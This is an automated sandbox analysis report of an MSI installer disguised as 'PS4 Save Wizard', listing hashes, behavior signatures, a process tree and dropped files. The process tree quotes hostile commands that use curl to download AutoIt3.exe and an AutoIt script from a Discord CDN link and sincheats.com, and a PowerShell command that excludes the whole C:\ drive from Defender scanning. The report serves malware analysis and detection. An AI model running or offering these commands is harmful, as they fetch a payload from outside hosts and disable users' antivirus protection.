Analysis
-
max time kernel
119s -
max time network
119s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
16-01-2022 19:21
General
-
Target
8c6cf25734d89865f9aaa5dea926d6dcb66558ac0493248237c36474b1d3bd0e.msi
-
Size
2.1MB
-
MD5
2db9ee63581f0297d8ca118850685602
-
SHA1
244c7008be6f767f0f31a341fe0e70fa2e9a5399
-
SHA256
8c6cf25734d89865f9aaa5dea926d6dcb66558ac0493248237c36474b1d3bd0e
-
SHA512
58cf0bdfe777ffcb01f9795d859f2daa9cb77d7587d1f054d8f5a0d456289d36e3c155fa6d6f5f4d47ef742a7038c3fa98b27093d6394e5db31cb5854ff5c8ff
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
-
Executes dropped EXE 2 IoCs
-
Drops startup file 1 IoCs
-
Loads dropped DLL 6 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in System32 directory 12 IoCs
-
Drops file in Windows directory 16 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 21 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 5 IoCs
-
Suspicious use of SendNotifyMessage 1 IoCs
-
Suspicious use of WriteProcessMemory 38 IoCs
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\8c6cf25734d89865f9aaa5dea926d6dcb66558ac0493248237c36474b1d3bd0e.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A7C96EA7A4D0DC8505D9B127A5BB3C032⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exe"C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exe"3⤵
- Executes dropped EXE
- Drops startup file
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/531227037579345940/914273423725846578/AutoIt3.exe --output C:\ProgramData\EdgeData\AutoIt3.exe | clip4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/531227037579345940/914273423725846578/AutoIt3.exe --output AutoIt3.exe | clip4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://sincheats.com/gas/run.au3 --output run.au3 | clip4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://sincheats.com/gas/run.au3 --output C:\ProgramData\EdgeData\run.au3 | clip4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\4⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_E5BD.ps1 -paths 'C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard','C:\Users\Admin\AppData\Roaming\SaveWiz inc','C:\Users\Admin\AppData\Roaming\SaveWiz inc' -retry_count 10"3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot14" "" "" "60919e20f" "0000000000000000" "00000000000005A0" "00000000000005B4"1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\AI_E5BD.ps1MD5
31e1ff54955cedd19c6e6932f10f7c55
SHA10b45e8fc0fb965d2a98ac1be82a3cbbe19fbd0f8
SHA2564ceb0eb297d9c6b2815b953b584a134838417a3db6691bcfc4d015f537e758fd
SHA512cb339d3409ec87dd70824d9b5b03d3b8b1ecb45af74090305e1c078daee9dca02fbcd53e014ac410eab8d4aa6177821405e6c138a2efec2940aa645c4d970ce9
-
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.dllMD5
897ca0836df7450082a666c3eb54884f
SHA1993c06e824b158cd2df52283f3b2784b28089d36
SHA25624748afdd647bcf3be291910d88d8b8b79062fa0af9700d00bfd724af88a77cc
SHA512647e6881e1b7acc4c53459fe780651d39a1016ef1c59da82cd469768b77f2064da329ed703d0548b12811cd8147e7febd5487d384ce0a967f9242d01cb0584b2
-
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exeMD5
a42fe5f4d4d30da09a31b721bdc006a7
SHA1b24636539fe1758501ba0f30da92f2c1f24ecf38
SHA2560fc80fb8e0dbc50e338127f17b0a31f521a6c0a220620e7e71ac71efc0c7cb61
SHA512d1aeead8f9cfe0ff190b04420e792fd1a75216cfafe624725768a25f8125754de2f20bfb9bb79d6dcd69a72bbb1d2a904f479bdf1faf8acb77536ca29286f2fc
-
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exeMD5
a42fe5f4d4d30da09a31b721bdc006a7
SHA1b24636539fe1758501ba0f30da92f2c1f24ecf38
SHA2560fc80fb8e0dbc50e338127f17b0a31f521a6c0a220620e7e71ac71efc0c7cb61
SHA512d1aeead8f9cfe0ff190b04420e792fd1a75216cfafe624725768a25f8125754de2f20bfb9bb79d6dcd69a72bbb1d2a904f479bdf1faf8acb77536ca29286f2fc
-
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exe.manifestMD5
40d927f29252eb0fbc5e22ad85852605
SHA1244a4dec6e31f750b131d5e4ab149d904077c405
SHA256051a061730819ebe2b9fd8e74fb326cc27526893eb78e690dd97d7068996aee7
SHA512621336201fd15aee2982f48aef77394c5cbef442dfdc4edbd7f71bccf8bce79b5725e824bacace59bdf5c41f55325744de5670d8f3cb81cd04e7a2485942c3f7
-
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.exeMD5
3563ae6b46b899129a49428aae61e1d4
SHA1877868a1cd7799b17ef64c3c8282cd6d4b077cc9
SHA256b8607c4530a0b895aec9e9c29c64c0f370f446dc2eb7541ce1b331cd915a2529
SHA5126b95ad08cb74368d9ada95a7b5aab996eaa3b2b034c1354c1d171c8c32c7e491eec9bb33aebdf4ef66d0b6a666a744256443b7e7c339e7cf144167b906180b79
-
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.exeMD5
3563ae6b46b899129a49428aae61e1d4
SHA1877868a1cd7799b17ef64c3c8282cd6d4b077cc9
SHA256b8607c4530a0b895aec9e9c29c64c0f370f446dc2eb7541ce1b331cd915a2529
SHA5126b95ad08cb74368d9ada95a7b5aab996eaa3b2b034c1354c1d171c8c32c7e491eec9bb33aebdf4ef66d0b6a666a744256443b7e7c339e7cf144167b906180b79
-
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.iniMD5
5184e09f08ecc2dbe4d2fd67630d9e4c
SHA15dde097a9170e11dce489342a801b39a621aaa8e
SHA2560363d05c0b31c3df1bee879a40e8d9315608b5263f65c71e59b4e08b27d58373
SHA512ccc6ccd46266a618760d180677e48187c0f072ba2c0252331fd73bd92999c74c2e66a0b268c8dab797c90fa52850d9c01a9516a72be5c5d9c28b83e4efa6f8f2
-
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\file_deleter.ps1MD5
31e1ff54955cedd19c6e6932f10f7c55
SHA10b45e8fc0fb965d2a98ac1be82a3cbbe19fbd0f8
SHA2564ceb0eb297d9c6b2815b953b584a134838417a3db6691bcfc4d015f537e758fd
SHA512cb339d3409ec87dd70824d9b5b03d3b8b1ecb45af74090305e1c078daee9dca02fbcd53e014ac410eab8d4aa6177821405e6c138a2efec2940aa645c4d970ce9
-
C:\Windows\Installer\MSI33BD.tmpMD5
0981d5c068a9c33f4e8110f81ffbb92e
SHA1badb871adf6f24aba6923b9b21b211cea2aeca77
SHA256b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68
SHA51259cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8
-
C:\Windows\Installer\MSI363E.tmpMD5
0981d5c068a9c33f4e8110f81ffbb92e
SHA1badb871adf6f24aba6923b9b21b211cea2aeca77
SHA256b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68
SHA51259cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8
-
C:\Windows\Installer\MSI3729.tmpMD5
0981d5c068a9c33f4e8110f81ffbb92e
SHA1badb871adf6f24aba6923b9b21b211cea2aeca77
SHA256b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68
SHA51259cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8
-
C:\Windows\Installer\MSI3814.tmpMD5
5f1b243813a203c66ba735139d8ce0c7
SHA1c60a57668d348a61e4e2f12115afb9f9024162ba
SHA25652d5b228221cd5276e4ee2a038e0ce0cf494d5af9c23ac45dcbfadc3115c8cb2
SHA512083c6d1af44847db4b6fb90349234128141a838d1d438d5c24f5063539a8087f0814d06cfa162aeace20e162292f64c7635b4a0e81b2ca972706cfbc484adfb5
-
C:\Windows\Installer\MSI3AB6.tmpMD5
5f1b243813a203c66ba735139d8ce0c7
SHA1c60a57668d348a61e4e2f12115afb9f9024162ba
SHA25652d5b228221cd5276e4ee2a038e0ce0cf494d5af9c23ac45dcbfadc3115c8cb2
SHA512083c6d1af44847db4b6fb90349234128141a838d1d438d5c24f5063539a8087f0814d06cfa162aeace20e162292f64c7635b4a0e81b2ca972706cfbc484adfb5
-
\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exeMD5
a42fe5f4d4d30da09a31b721bdc006a7
SHA1b24636539fe1758501ba0f30da92f2c1f24ecf38
SHA2560fc80fb8e0dbc50e338127f17b0a31f521a6c0a220620e7e71ac71efc0c7cb61
SHA512d1aeead8f9cfe0ff190b04420e792fd1a75216cfafe624725768a25f8125754de2f20bfb9bb79d6dcd69a72bbb1d2a904f479bdf1faf8acb77536ca29286f2fc
-
\Windows\Installer\MSI33BD.tmpMD5
0981d5c068a9c33f4e8110f81ffbb92e
SHA1badb871adf6f24aba6923b9b21b211cea2aeca77
SHA256b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68
SHA51259cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8
-
\Windows\Installer\MSI363E.tmpMD5
0981d5c068a9c33f4e8110f81ffbb92e
SHA1badb871adf6f24aba6923b9b21b211cea2aeca77
SHA256b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68
SHA51259cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8
-
\Windows\Installer\MSI3729.tmpMD5
0981d5c068a9c33f4e8110f81ffbb92e
SHA1badb871adf6f24aba6923b9b21b211cea2aeca77
SHA256b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68
SHA51259cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8
-
\Windows\Installer\MSI3814.tmpMD5
5f1b243813a203c66ba735139d8ce0c7
SHA1c60a57668d348a61e4e2f12115afb9f9024162ba
SHA25652d5b228221cd5276e4ee2a038e0ce0cf494d5af9c23ac45dcbfadc3115c8cb2
SHA512083c6d1af44847db4b6fb90349234128141a838d1d438d5c24f5063539a8087f0814d06cfa162aeace20e162292f64c7635b4a0e81b2ca972706cfbc484adfb5
-
\Windows\Installer\MSI3AB6.tmpMD5
5f1b243813a203c66ba735139d8ce0c7
SHA1c60a57668d348a61e4e2f12115afb9f9024162ba
SHA25652d5b228221cd5276e4ee2a038e0ce0cf494d5af9c23ac45dcbfadc3115c8cb2
SHA512083c6d1af44847db4b6fb90349234128141a838d1d438d5c24f5063539a8087f0814d06cfa162aeace20e162292f64c7635b4a0e81b2ca972706cfbc484adfb5
-
memory/560-85-0x0000000000000000-mapping.dmp
-
memory/1036-76-0x0000000000000000-mapping.dmp
-
memory/1036-82-0x0000000001E10000-0x0000000001E11000-memory.dmpFilesize
4KB
-
memory/1564-99-0x00000000022F0000-0x0000000002F3A000-memory.dmpFilesize
12.3MB
-
memory/1564-98-0x00000000022F0000-0x0000000002F3A000-memory.dmpFilesize
12.3MB
-
memory/1564-97-0x00000000022F0000-0x0000000002F3A000-memory.dmpFilesize
12.3MB
-
memory/1564-95-0x0000000000000000-mapping.dmp
-
memory/1592-54-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmpFilesize
8KB
-
memory/1612-92-0x0000000002664000-0x0000000002667000-memory.dmpFilesize
12KB
-
memory/1612-93-0x000000000266B000-0x000000000268A000-memory.dmpFilesize
124KB
-
memory/1612-87-0x0000000000000000-mapping.dmp
-
memory/1612-89-0x000007FEF2C70000-0x000007FEF37CD000-memory.dmpFilesize
11.4MB
-
memory/1612-90-0x0000000002660000-0x0000000002662000-memory.dmpFilesize
8KB
-
memory/1612-91-0x0000000002662000-0x0000000002664000-memory.dmpFilesize
8KB
-
memory/1744-86-0x0000000000000000-mapping.dmp
-
memory/1764-57-0x0000000076151000-0x0000000076153000-memory.dmpFilesize
8KB
-
memory/1764-56-0x0000000000000000-mapping.dmp
-
memory/1872-83-0x0000000000000000-mapping.dmp
-
memory/1920-74-0x0000000074D41000-0x0000000074D43000-memory.dmpFilesize
8KB
-
memory/1920-69-0x0000000000000000-mapping.dmp
-
memory/1920-73-0x0000000000100000-0x0000000000101000-memory.dmpFilesize
4KB
-
memory/1968-84-0x0000000000000000-mapping.dmp